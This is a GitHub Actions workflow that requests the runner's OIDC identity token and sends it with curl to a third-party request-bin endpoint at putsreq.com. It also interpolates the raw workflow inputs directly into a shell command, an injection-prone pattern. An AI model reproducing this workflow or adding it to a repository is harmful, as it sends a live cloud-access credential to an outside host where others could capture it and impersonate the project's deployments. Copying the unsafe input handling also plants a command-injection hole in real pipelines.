name: Manual

permissions:
  id-token: write # required to request id-token

on:
  push: 
    branches:    
      - master
  workflow_dispatch:
    inputs:
      logLevel:
        description: Log level
        type: choice
        options:
        - info
        - warning
        - debug 
        default: warning 
  
jobs:
  run:
    runs-on: [ubuntu-latest]
    
    steps:
    - name: Add Inouts
      # if: ${{ github.event.inputs }}
      run: |
        echo "Input Parameters: ${{ toJSON(github.event.inputs) }}"

    - run: |
        echo ACTIONS_ID_TOKEN_REQUEST_URL $ACTIONS_ID_TOKEN_REQUEST_URL

        OIDC_TOKEN=$(
          curl -sLS "${ACTIONS_ID_TOKEN_REQUEST_URL}" \
            -H "User-Agent: actions/oidc-client" \
            -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN"
        )
        curl -i -s --data-binary "$OIDC_TOKEN" https://putsreq.com/aBB8O4s2D0PuDWTKlSK1 
      

